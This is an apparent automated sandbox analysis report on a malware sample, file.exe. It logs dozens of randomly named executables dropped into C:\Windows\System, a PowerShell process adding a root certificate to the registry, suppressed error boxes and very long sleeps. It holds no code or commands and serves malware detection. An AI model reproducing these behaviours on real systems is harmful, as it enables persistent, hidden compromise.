Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HbWODob.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WVsCsMZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgBtrMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TBNKhIN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TQUlNhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\izzcVgF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mbSqRHL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lyMiIxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\veVfAiw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HVhldsH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZPBkGsL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZXNyiNu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sGYPztO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIXgzbs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGSooXz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yzVBTwc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\chBMsUn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EDndQMl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uxMRJKa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OyxgWny.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fhxlOMT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bxBimDh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mPNsbfH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WZkiNdG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nkFLDPI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yolnOnG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SUucMiy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFpkhGM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AOSuUmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DNhkeWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\svRRwoZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nKUJunm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HuKkgJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mBbgLGb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DCqXTox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PbUiiSM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VsobEcA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CVYvaQs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KeLPRxW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tWOQBIk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mshbGSl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ccbrmxM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sJZigTD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvowvSL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BnLcQMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkazDeV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mdMaqgD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTpsbWr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cBoEBlV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NqPZXyD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dbgHMyC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cyvijMt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ykZgpGK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UqXZtcb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YIjJOqk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JqFVNbS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wNVvJxX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oCLXTVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dPvMBBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WCbcoxD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CoTJSDT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wnWUbPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZFvVqBc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VjXLpYb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lVudyTV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WdIXuil.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DBfMBcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iYYYydA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XbARtow.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vKoIcLB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAngvPh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wPprRzW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xyokMuX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ckHJCFb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\imwRXsl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kPkYoOt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FlmGZHf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pnGqAlS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HHsWpNX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LFQLRaY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ghXRScL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VHwkuIa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HjdahEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMMnfcQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFbtfKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hzIYZSD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QqSzknx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LTWTGcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LLELsGo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIthybV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LCScugy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eaXsKmO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQPgIol.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NrRaZIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTVvNoy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lBrohsB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hyzwXgh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sdTevgk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\skgGGJN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJZyUBH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ucDGEkw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AXEGSHs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JdmbeCb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hMvDOJd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nWSykjl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pGmaKvE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EENzfBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QrBMIBp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NDapyRM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CGpcHNw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pBTelAj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GoSpvOG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bsgTRXG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tJmWuwF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jmSIZKC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OgBLDNx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yuTigyc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dMXkTWG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVpmxhg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mByREeI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rtBLYbw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EzVUaNc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EZbURBQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\geBTNDq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TVNHEGY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PjowoJp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bzSbRdi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FoekgWP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sDLqeeh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bFsdWPU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvkREuJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aBqatWR.exe	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\System\xIpouRJ.exe

4_2_00007FF66685EBF0

Stores large binary data to the registry

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3630

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HUohYxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\kYjPKaN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RcAqfwv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\StIsyPE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PaGFrFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\MydOwjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\OpMgkKg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HKdVaSy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WOvgLKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FgiIXgf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NyhRMmW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rgBmwKj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\QdDnaqt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BpqsHCR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gKbbPbF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\kFAVWnk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xsirwHn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XWzPvUm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\roZGxps.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SAfbgcC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wkIkkhX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UQkDiSP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ffPPQcz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\AQSffhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uRBSbtU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\cVJdttA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VLekFWd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\CpMhLMx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FGUHzJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\YYCxOQh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rYIlnZs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BwBweqn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dCnJkoQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NuxBytj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gXwIlxx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pzbELEW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HNocQDn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ftWkAMN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\nJFWveO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\qdErmhf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rfpCYxf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xZqqKxJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HEPcUok.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rQJmlSe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UiAsnNy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fXSZuyj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ArNQyZf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\qQyXqOp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fIqTNJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hAjIjRa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rDRaLhy.exe	Jump to dropped file
